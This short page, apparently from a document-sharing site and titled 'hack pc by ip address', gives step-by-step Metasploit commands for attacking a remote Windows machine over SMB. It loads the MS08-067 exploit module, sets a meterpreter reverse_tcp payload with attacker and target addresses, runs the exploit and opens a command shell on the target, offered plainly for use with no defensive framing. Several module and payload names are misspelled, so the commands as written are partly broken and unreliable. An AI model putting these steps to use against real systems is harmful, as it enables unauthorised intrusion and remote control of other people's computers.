You are on page 1of 1

hack pc by ip address

step 1
msfconsole
step 2
use windows /smb/ms08_067_netpi
step3
set payload winodws /meterpreter /reverse_tcp payload=> windows/meterpreter/reve
rse_tcp
set lhost IP
open terminal and get your ip by typign
ifconfig
set rhost another ip
set lport 4444
set rport 445
show options
exploit
meterpreter > shell
c:

You might also like